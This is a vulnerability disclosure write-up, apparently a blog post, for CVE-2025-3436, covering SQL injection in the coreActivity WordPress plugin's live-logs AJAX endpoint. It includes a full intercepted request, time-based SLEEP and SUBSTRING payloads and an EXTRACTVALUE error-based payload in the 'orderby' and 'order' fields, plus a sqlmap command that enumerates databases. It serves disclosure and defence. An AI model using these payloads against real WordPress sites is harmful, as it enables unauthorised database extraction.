# CVE-2025-3436: Multiple SQL Injection in coreActivity Activity Logging plugin for WordPress - Report

### Reference / Advisory Number : CVE-2025-3436

### Vulnerable WordPress Plugin Link: [https://wordpress.org/plugins/coreactivity/](https://wordpress.org/plugins/coreactivity/)

### Description of the vulnerability

The coreActivity Activity Logging plugin for WordPress suffers from a time based SQL injection and Boolan-based SQL Injection vulnerabilities in the /wpadmin/admin-ajax.php?action=coreactivity\_live\_logs. The vulnerable parameter is the "args" parameter., the exact injection occurs in "orderby" and "order" fields. More details can be found in the analysis above with manual exploitation.

An authenticated attacker can inject specially crafted SQL payloads to extract data from the underlying database.

These vulnerabilities allow an authenticated attacker to manipulate SQL queries by injecting malicious SQL code.

### Burpsuite Request (cookies header need to be updated by your cookies when authenticated)

`POST /wp-admin/admin-ajax.php?action=coreactivity_live_logs HTTP/1.1   Host: 10.0.1.124 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0   Accept: text/html, /; q=0.01   Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3   Accept-Encoding: gzip, deflate, br   Referer: http://10.0.1.124/wp-admin/admin.php?page=coreactivity-logs   Content-Type: application/x-www-form-urlencoded; charset=UTF-8   X-Requested-With: XMLHttpRequest   Content-Length: 638   Origin:` [`http://10.0.1.124`](http://10.0.1.124)`   Connection: keep-alive   Cookie: [Your cookies here]`

`args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}`

### Steps to reproduce

* Install the WordPress plugin : coreActivity Activity Logging plugin for WordPress
    
    * Link: [https://wordpress.org/plugins/coreactivity/](https://wordpress.org/plugins/coreactivity/)
        
* Set up a web proxy such as Burp Suite or Caido to intercept the web requests made by the web browser
    
* Access to coreActivity bar in WordPress admin panel
    
* On the web proxy's history look for a POST request to the /wp-admin/admin-ajax.php?action=coreactivity\_live\_logs endpoint and send it to repeater
    

The request got following the steps above

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761078695375/e2cd9865-0745-4f71-8988-0acdb49e407b.png align="center")

Then we got the request in Burp Proxy History

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761078756924/390d546e-02a3-49ba-b8d7-0bf0cb6a5773.png align="center")

In Burp (or your proxy), replace the parameters in the URL with the following parameters to provoke SQL Error (for order field and same for orderby field)

`args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC'","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"10","nonce":"24a53b57aa","page":"coreactiv ity-logs"}`

Got Error sql MariaDB&gt; Potential SQL Injection

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761078815795/25c089cb-6013-4980-bea6-e8359e588665.png align="center")

Notice the following injectable json fiels in args parameter (all the following fields provoke SQL error when injecting quote "'")

* orderby
    
* order
    

## Manual Exploit

* ## field: orderby
    

In Burp (or your proxy), replace the parameters in the URL with the following parameters

`args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+ (SELECT(SLEEP(5)))a)","order":"DESC","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}`

the orderby value is: `1+AND+(SELECT+1598+FROM+(SELECT(SLEEP(5)))a)`

Then we got a sleep for ~6 seconds

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761079032192/e8b13a07-2bb9-42de-9558-2a0ee68dd160.png align="center")

To further exploit the potential for data extraction, we can utilize the following parameter:

`args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+ (SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)","order":"DESC","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}`

the response for the payload "1+AND+(SELECT+1598+FROM+(SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)" injected in orderby field sleep because "w" is the first char of the database name

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761079088003/a26a4e8a-231f-4b6f-bd7d-6a9be2ef511e.png align="center")

Finally, we can extract the database name "wordpress" using burp intruder with Cluster bomb attack type and analyzing the response

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761079124949/4b3ced27-b0a4-49b7-8c93-885acf5f43ba.png align="center")

The following screenshot show us the sleeping time and using request order, we can get the name of database "wordpress"

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761079152112/7b307ed0-1bac-4f80-9940-bf208f2fc438.png align="center")

* ## field: order "Boolean-Based SQL Injection"
    

For this field, i used EXTRACTVALUE() function, which is typically used in XML path language expressions. It's used to trigger XML-related error messages that can expose data in an error-based SQL injection.

In our request, we change the "args" parameter with:

`args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"-3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+ (SELECT+DATABASE())))","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}`

The "order" field is: `-3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+(SELECT+DATABASE())))`

The following screenshot show us the database name "wordpress" extraction

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1761079361577/1ff8c193-8014-44e5-91ab-fdaaeb1a6b9b.png align="center")

## Automatic Exploit using SQLMAP

`sqlmap -r req1_log.txt --random-agent --risk 3 --level 5 --dbms=mariadb,mysql --dbs`

But don’t forget to add “\*” in your injection location.

### ***Cheers — thanks for reading, and keep security first.***
